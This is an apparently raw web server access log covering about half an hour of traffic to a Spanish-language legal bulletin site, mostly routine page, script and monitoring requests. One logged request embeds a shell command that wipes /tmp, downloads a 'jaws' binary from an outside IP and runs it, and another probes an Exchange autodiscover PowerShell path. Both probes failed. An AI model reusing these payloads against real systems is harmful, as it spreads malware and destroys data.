172.22.2.4 - - [14/Aug/2023:04:01:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2023:04:03:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:04:03:17 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4829
172.22.2.4 - - [14/Aug/2023:04:03:19 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [14/Aug/2023:04:03:21 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5614
172.22.2.4 - - [14/Aug/2023:04:03:23 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7496
172.22.2.4 - - [14/Aug/2023:04:03:26 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
172.22.2.4 - - [14/Aug/2023:04:03:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/Aug/2023:04:02:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
172.22.2.4 - - [14/Aug/2023:04:04:07 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/Aug/2023:04:04:16 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Aug/2023:04:04:16 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2023:04:04:25 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/Aug/2023:04:04:25 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/Aug/2023:04:04:25 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/Aug/2023:04:04:29 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/Aug/2023:04:04:29 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
113.207.1.133 - - [14/Aug/2023:04:04:34 -0500] "GET /galeria/galeria/fotos/Capellania2P.jpg HTTP/1.1" 200 35380
172.22.2.4 - - [14/Aug/2023:04:06:09 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
201.245.192.253 - - [14/Aug/2023:04:06:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
113.207.1.133 - - [14/Aug/2023:04:08:04 -0500] "GET /galeria/galeria/fotos/diaSC2Peq.jpg HTTP/1.1" 200 23761
216.245.221.92 - - [14/Aug/2023:04:08:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:04:07:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:04:08:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56970
172.22.2.4 - - [14/Aug/2023:04:09:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61922
201.245.192.253 - - [14/Aug/2023:04:11:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:04:13:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:04:13:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:04:15:06 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:04:14:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
201.245.192.253 - - [14/Aug/2023:04:16:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:04:18:14 -0500] "HEAD / HTTP/1.1" 200 -
111.11.221.9 - - [14/Aug/2023:04:18:54 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [14/Aug/2023:04:18:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43693
201.245.192.253 - - [14/Aug/2023:04:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41571
172.22.2.4 - - [14/Aug/2023:04:17:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61130
172.22.2.4 - - [14/Aug/2023:04:19:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:04:21:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:04:19:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58981
172.22.2.4 - - [14/Aug/2023:04:21:16 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61130
216.245.221.92 - - [14/Aug/2023:04:23:14 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.208 - - [14/Aug/2023:04:24:48 -0500] "GET /BLA/resoluciones/AUTOS%202022/2873.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Aug/2023:04:26:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:04:24:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.7.60.114 - - [14/Aug/2023:04:26:44 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Aug/2023:04:25:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
216.245.221.92 - - [14/Aug/2023:04:28:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:04:28:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43693
201.245.192.253 - - [14/Aug/2023:04:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41571
172.22.2.4 - - [14/Aug/2023:04:30:08 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 1018
201.245.192.253 - - [14/Aug/2023:04:31:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:04:31:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/Aug/2023:04:31:22 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2023:04:31:22 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
